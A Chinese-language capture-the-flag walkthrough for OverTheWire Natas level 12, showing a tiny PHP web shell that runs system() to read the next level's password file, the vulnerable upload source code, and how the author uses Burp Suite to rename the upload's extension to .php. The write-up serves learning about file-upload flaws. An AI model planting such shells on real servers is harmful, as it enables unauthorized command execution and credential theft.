0
点赞
收藏
分享

微信扫一扫

OverTheWire攻关过程-Natas模块12


我们打开lv12,查看信息



OverTheWire攻关过程-Natas模块12_上传


登陆


OverTheWire攻关过程-Natas模块12_上传文件_02


可以看到一个文件上传按钮


我们试一试上传文件


OverTheWire攻关过程-Natas模块12_上传_03


点击“upload file”


OverTheWire攻关过程-Natas模块12_上传_04


报错


重新上传一份


OverTheWire攻关过程-Natas模块12_php_05


OverTheWire攻关过程-Natas模块12_php_06


文件最大1KB


那就写个文本,改个格式试一试


<?php
system('cat /etc/natas_webpass/natas13');
?>


使用system函数执行命令


查看源码


?php

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    do {
    $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);


        if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>


大概的思路是这样的


1、从数字和字母中随机组成文件的名字


OverTheWire攻关过程-Natas模块12_上传文件_07


2、判断文件的大小


OverTheWire攻关过程-Natas模块12_上传_08


3、回显文件的路径


OverTheWire攻关过程-Natas模块12_上传_09


我们打开BP,进行抓包


OverTheWire攻关过程-Natas模块12_php_10


准备好cat文件


OverTheWire攻关过程-Natas模块12_php_11


开启拦截


OverTheWire攻关过程-Natas模块12_php_12


上传文件


OverTheWire攻关过程-Natas模块12_上传文件_13


修改名称


OverTheWire攻关过程-Natas模块12_上传文件_14


显示上传成功


OverTheWire攻关过程-Natas模块12_php_15


访问链接

修改名称


OverTheWire攻关过程-Natas模块12_php_16


重新来一次

再次修改名称为php


OverTheWire攻关过程-Natas模块12_上传_17


得到密码


OverTheWire攻关过程-Natas模块12_php_18

OverTheWire攻关过程-Natas模块12_上传文件_19


举报

相关推荐

0 条评论